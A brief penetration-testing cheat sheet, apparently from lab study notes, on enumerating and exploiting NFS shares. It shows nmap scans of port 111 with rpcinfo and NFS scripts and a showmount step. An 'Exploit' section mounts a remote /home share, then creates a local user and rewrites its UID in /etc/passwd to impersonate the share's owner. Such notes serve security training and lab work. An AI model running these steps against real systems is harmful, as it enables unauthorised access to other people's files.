# NFS Enumeration

> Step by Step NFS Enumeration

NFS stands for Network File System

**Scan for NFS Share**

```
nmap -v -p 111 10.11.1.1-254
nmap -sV -p 111 --script=rpcinfo 10.11.1.1-254
```

Port 2049 is for NFS

**NSE Scripts**

```
nmap -p 111 --script nfs* 10.11.1.72
```
**Show Mount**

```
showmount -e <target>
```

Exploit:

```
mkdir home
sudo mount -o nolock 10.11.1.72:/home ~/home/
cd home/ && ls
sudo adduser pwn
sudo sed -i -e 's/1001/1014/g' /etc/passwd
```